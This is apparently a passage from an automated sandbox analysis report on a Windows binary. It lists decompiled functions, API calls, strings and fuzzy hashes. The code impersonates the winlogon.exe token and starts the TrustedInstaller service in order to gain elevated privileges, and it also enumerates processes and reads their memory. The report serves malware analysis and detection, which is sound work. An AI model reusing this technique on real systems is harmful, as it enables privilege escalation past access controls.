					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}

APIs

memset.MSVCRT ref: 0040201D
memset.MSVCRT ref: 00402035

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00402050
wcslen.MSVCRT ref: 0040205F
wcslen.MSVCRT ref: 004020B4
_wtoi.MSVCRT ref: 004020D7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61

Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

wcschr.MSVCRT ref: 00402259
CreateProcessW.KERNEL32 ref: 004022B8
GetLastError.KERNEL32(?,?,00000000), ref: 004022C2

Strings

ServicesActive, xrefs: 0040216D
TrustedInstaller.exe, xrefs: 0040219C
winlogon.exe, xrefs: 00402049, 00402076

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
API String ID: 3201562063-2355939583
Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59

Uniqueness

Uniqueness Score: -1.00%

Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120
processlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				int _t46;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(1) {
					_t46 = Process32NextW(_v12,  &_v1136); // executed
					if(_t46 == 0) {
						break;
					}
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}

APIs

Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
memset.MSVCRT ref: 0040962E
Process32FirstW.KERNEL32(?,?), ref: 0040964A
OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
memset.MSVCRT ref: 004096C6
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Strings

kernel32.dll, xrefs: 004096F7
QueryFullProcessImageNameW, xrefs: 00409706

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
String ID: QueryFullProcessImageNameW$kernel32.dll
API String ID: 239888749-1740548384
Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}

0x00409924
0x0040992c
0x00409937
0x0040993f
0x0040994a
0x00409956
0x00409962
0x0040996e
0x00409971
0x00409973
0x00000000
0x00409976
0x00409977

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

Strings

GetModuleBaseNameW, xrefs: 00409937
GetModuleInformation, xrefs: 00409967
EnumProcesses, xrefs: 0040995B
EnumProcessModules, xrefs: 00409943
psapi.dll, xrefs: 00409927
GetModuleFileNameExW, xrefs: 0040994F

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$memsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1529661771-70141382
Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,0040C390,00000070), ref: 0040B2D5
__set_app_type.MSVCRT ref: 0040B334
__p__fmode.MSVCRT ref: 0040B349
__p__commode.MSVCRT ref: 0040B357
__setusermatherr.MSVCRT ref: 0040B383
_initterm.MSVCRT ref: 0040B399
__wgetmainargs.KERNELBASE ref: 0040B3BC
_initterm.MSVCRT ref: 0040B3CF
GetStartupInfoW.KERNEL32(?), ref: 0040B42C
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040B452
exit.KERNELBASE ref: 0040B469
_cexit.MSVCRT ref: 0040B46F

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				int _t43;
				int _t45;
				void* _t48;
				void* _t56;
				signed int _t57;
				long _t61;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
					if(_t43 == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
						_t69 = _t61;
						E004055D1(_t61,  &_v28);
					}
					_t45 = FindCloseChangeNotification(_a16); // executed
					E004055D1(_t45,  &_v564);
				}
				return _t69;
			}

0x00401ac9
0x00401ad1
0x00401ae1
0x00401ae7
0x00401ae9
0x00401aec
0x00401c1b
0x00401af2
0x00401af2
0x00401af8
0x00401b0c
0x00401b12
0x00401b1a
0x00401bfd
0x00401b20
0x00401b26
0x00401b2b
0x00401b36
0x00401b40
0x00401b43
0x00401b4a
0x00401b54
0x00401b55
0x00401b56
0x00401b57
0x00401b58
0x00401b63
0x00401b68
0x00401b69
0x00401b77
0x00401b7d
0x00401b82
0x00401b82
0x00401b88
0x00401b8b
0x00401b8e
0x00401b91
0x00401b98
0x00401b9b
0x00401ba0
0x00401ba5
0x00401baa
0x00401bac
0x00401bac
0x00401bb2
0x00401bb2
0x00401bbe
0x00401bc4
0x00401bc6
0x00401bc8
0x00401bc8
0x00401bd7
0x00401be6
0x00401bee
0x00401bf0
0x00401bf0
0x00401c02
0x00401c0e
0x00401c0e
0x00401c23

APIs

OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
memset.MSVCRT ref: 00401B4A
ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
_snwprintf.MSVCRT ref: 00401B69

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA

GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15

Strings

%d %I64x, xrefs: 00401B58

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
String ID: %d %I64x
API String ID: 1126726007-2565891505
Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}

APIs

memset.MSVCRT ref: 00401F27
memset.MSVCRT ref: 00401F3F

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00401F5A
wcslen.MSVCRT ref: 00401F69
ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Strings

winlogon.exe, xrefs: 00401F54, 00401F59, 00401F80
SeImpersonatePrivilege, xrefs: 00401FB4

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
String ID: SeImpersonatePrivilege$winlogon.exe
API String ID: 3867304300-2177360481
Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC

Uniqueness

Uniqueness Score: -1.00%

Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}

0x00401319
0x0040131b
0x00401327
0x0040132b
0x0040133a
0x0040134b
0x0040134b
0x0040134e
0x0040134e
0x00401353
0x0040135b

APIs

OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353

Strings

TrustedInstaller, xrefs: 00401311

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseHandle$OpenQueryStartStatus
String ID: TrustedInstaller
API String ID: 862991418-565535830
Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9

Uniqueness

Uniqueness Score: -1.00%

Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27
libraryloadertimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}

0x0040955f
0x00409566
0x0040956e
0x00409576
0x00409586
0x00409586
0x0040956e
0x00409592
0x004095aa
0x00409594
0x004095a3
0x004095a6
0x004095a6

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3

Strings

kernel32.dll, xrefs: 00409561
GetProcessTimes, xrefs: 00409570

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
SizeofResource.KERNEL32(?,00000000), ref: 0040A359
LoadResource.KERNEL32(?,00000000), ref: 0040A369
LockResource.KERNEL32(00000000), ref: 0040A374

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
